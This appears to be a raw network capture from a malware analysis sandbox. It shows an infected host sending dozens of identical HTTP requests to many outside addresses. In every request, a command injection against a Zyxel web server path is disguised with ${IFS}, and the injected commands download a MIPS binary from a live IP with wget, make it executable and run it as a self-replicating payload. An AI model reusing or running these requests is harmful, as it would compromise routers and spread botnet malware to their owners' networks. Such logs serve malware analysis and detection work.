                                                Jan 29, 2024 07:07:48.342767000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4294192.168.2.235767853.139.161.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.342803001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4295192.168.2.2341778111.241.44.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.342842102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4296192.168.2.233835859.94.138.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.342896938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4297192.168.2.235475848.252.27.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.342932940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4298192.168.2.2342160169.166.158.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.342974901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4299192.168.2.2358856162.118.209.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.342997074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4300192.168.2.2346028153.89.143.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.343055010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4301192.168.2.235812247.188.222.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.343082905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4302192.168.2.234320038.9.88.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.343117952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4303192.168.2.2335206198.238.150.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.343159914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4304192.168.2.2342050178.188.212.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.343194962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4305192.168.2.2337190210.210.232.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.343241930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4306192.168.2.2357436223.92.23.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.343281031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4307192.168.2.236006073.61.181.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.343313932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4308192.168.2.2351298130.119.235.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.343350887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4309192.168.2.2343306161.107.85.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.343384981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4310192.168.2.234239679.211.212.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.343425035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4311192.168.2.2353502177.154.224.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.343482018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4312192.168.2.234454635.156.8.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.343518972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4313192.168.2.2334316104.212.161.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.343558073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4314192.168.2.2356502205.91.236.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.343615055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4315192.168.2.2348344186.248.43.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.343631983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4316192.168.2.2346912143.54.43.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.343678951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4317192.168.2.235354260.147.135.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.343717098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4318192.168.2.23603541.97.227.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.343755960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4319192.168.2.2333280121.223.209.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.343791962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4320192.168.2.2350372107.148.49.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.343836069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4321192.168.2.2333244178.126.161.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.343873024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4322192.168.2.234087683.212.232.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.343923092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4323192.168.2.2344958201.106.250.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.343944073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4324192.168.2.2340710173.245.96.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.343977928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4325192.168.2.235230027.123.187.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.344017982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4326192.168.2.234030235.64.197.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.344058037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4327192.168.2.235598040.161.1.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.344106913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4328192.168.2.2355958160.158.126.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.344171047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4329192.168.2.2337678105.119.139.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.344211102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4330192.168.2.2340102117.56.23.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.344233990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4331192.168.2.2344708190.157.184.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.344264984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4332192.168.2.235209043.23.60.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.344319105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4333192.168.2.2343942211.102.99.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.344347000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4334192.168.2.2345344213.59.32.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.344367027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4335192.168.2.2357536143.193.25.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.344393015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4336192.168.2.2353220104.94.77.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.344430923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4337192.168.2.2343182114.166.37.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.344458103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4338192.168.2.234297866.189.33.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.344489098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4339192.168.2.2351970110.241.29.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.344522953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4340192.168.2.2358534146.67.12.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.344558001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4341192.168.2.2333922199.229.7.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.344585896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4342192.168.2.2349936130.211.10.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.344650984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4343192.168.2.235924282.201.26.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.344670057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4344192.168.2.2334168134.176.224.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.344707966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4345192.168.2.2339398168.95.166.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.344727993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4346192.168.2.233779463.0.71.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.344782114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4347192.168.2.2351410200.56.150.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.344810009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4348192.168.2.2344466171.72.57.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.344852924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4349192.168.2.2344270213.124.193.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.344894886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4350192.168.2.233662062.138.166.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.344950914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4351192.168.2.2343480130.30.82.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.344983101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4352192.168.2.2352824190.14.231.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.345033884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4353192.168.2.2346746145.223.135.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.345082998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4354192.168.2.236002898.217.197.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.345117092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4355192.168.2.2354590197.88.119.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.345170975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4356192.168.2.234840479.241.119.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.345195055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4357192.168.2.234259241.57.11.101443
                                                TimestampBytes transferredDirectionData
